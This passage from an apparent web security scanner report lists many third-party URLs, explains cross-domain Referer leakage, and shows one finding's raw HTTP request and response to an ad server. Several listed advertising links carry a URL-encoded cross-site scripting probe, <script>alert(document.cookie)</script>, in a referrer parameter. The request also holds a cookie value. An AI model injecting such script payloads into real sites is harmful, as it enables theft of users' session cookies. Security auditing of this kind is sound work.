http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/921111570/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923231364/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/923268972/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/92510348/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/9254732/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/927498208/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/932017176/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/94065203/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/961952614/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976571722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top
http://opensourcematters.org/index.php
http://people.joomla.org/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html
http://picasaweb.google.com/lh/view
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://rcm.amazon.com/e/cm
http://rcm.amazon.com/e/cm
http://rcm.amazon.com/e/cm
http://rd.apmebf.com/w/pg
http://scholar.google.com/schhp
http://scholar.google.com/scholar
http://slashdot.org/bookmark.pl
http://sourceforge.net/softwaremap/
http://tag.admeld.com/pixel
http://tags.bluekai.com/site/10
http://tags.bluekai.com/site/10
http://translate.google.com/
http://translate.google.com/translate_t
http://tweetmeme.com/eyewonder/interim.html
http://tweetmeme.com/search
http://tweetmeme.com/story.php
http://twitter.com/
http://twitter.com/share
http://video.google.com/
http://www.abbreviations.com/bs2.aspx
http://www.abbreviations.com/searchAmazon.aspx
http://www.addthis.com/bookmark.php
http://www.addthis.com/feed.php
http://www.amazon.com/
http://www.amazon.com/b/
http://www.amazon.com/books-used-books-textbooks/b
http://www.amazon.com/dp/0313363153
http://www.amazon.com/dp/0814410960
http://www.amazon.com/dp/B000EFAO1G
http://www.amazon.com/dp/B001AIM6V2
http://www.amazon.com/dp/B0037UT1LY
http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b
http://www.amazon.com/gp/product/0596804946
http://www.amazon.com/music-rock-classical-pop-jazz/b
http://www.amazon.com/toys/b
http://www.autobytel.com/content/buy/index.cfm
http://www.autobytel.com/content/home/help/index.cfm
http://www.autobytel.com/content/home/index.cfm
http://www.autocheck.com/
http://www.autotrader.com/
http://www.autotrader.com/
http://www.autotrader.com/hornav/trader/index.jsp
http://www.autotraderstatic.com/inc/global.js
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
http://www.carmax.com/
http://www.dynamicdrive.com/forums/showthread.php
http://www.espatial.com/contact/live-trial-adwords
http://www.eyewonderlabs.com/ct.cfm
http://www.facebook.com/apps/application.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/connect/connect.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/profile.php
http://www.facebook.com/sharer.php
http://www.fiction.net/blong/programs/#aub/x26amp
http://www.filewatcher.com/_/
http://www.flickr.com/badge_code_v2.gne
http://www.flickr.com/badge_code_v2.gne
http://www.freebsd.org/cgi/pds.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.freebsd.org/cgi/url.cgi
http://www.google.com/finance
http://www.google.com/finance
http://www.google.com/imghp
http://www.google.com/language_tools
http://www.google.com/prdhp
http://www.google.com/preferences
http://www.google.com/realtime
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/support/chrome/bin/answer.py
http://www.google.com/support/websearch/bin/answer.py
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/webhp
http://www.groupon.com/washington-dc/subscribe
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp
http://www.hugg.com/submit
http://www.jeroenwijering.com/
http://www.linkagogo.com/go/AddNoPopup
http://www.lithuanianjoomla.com/component/users/
http://www.liutilities.com/affcb/
http://www.livejournal.com/update.bml
http://www.lynda.com/landing/softwaretraining.aspx
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136
http://www.mindbodygreen.com/passvote.action
http://www.mister-wong.com/index.php
http://www.netscape.com/submit/
http://www.newsvine.com/_wine/save
http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp
http://www.officedepot.com/promo.do
https://www.paperg.com/post.php
http://www.simpy.com/simpy/LinkAdd.do
http://www.soundingsonline.com/archives
http://www.soundingsonline.com/component/chronocontact/
http://www.soundingsonline.com/index.php
http://www.soundingsonline.com/index.php
http://www.standingcloud.com/growbusiness.php
http://www.stumbleupon.com/submit
http://www.svenskjoomla.se/index.php
http://www.t-mobile.com/Company/Community.aspx
http://www.thisnext.com/pick/new/submit/sociable/
http://www.x64bitdownload.com/contact.html
http://www.x64bitdownload.com/software-advanced.html
http://www.youtube.com/
http://www.youtube.com/subscribe_widget
http://www1.whdh.com/includes/elements/accordion_whdh
http://www1.whdh.com/includes/elements/sidecol_video_box.php
http://www1.whdh.com/includes/elements/sidecol_video_box.php
http://www1.whdh.com/video/player/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

20.1. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5875.270604.B3/B5111946.91

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?

The response contains the following links to other domains:

http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3938818&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1118
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:25:22 GMT
Expires: Tue, 25 Jan 2011 04:25:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
edDest=http://express.dominos.com/pages/track.jsp?target=promocode&promocode=BANNQ7WN3&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=ban_BANNQ7WN3&utm_campaign=MindshareBanner" target="_blank">
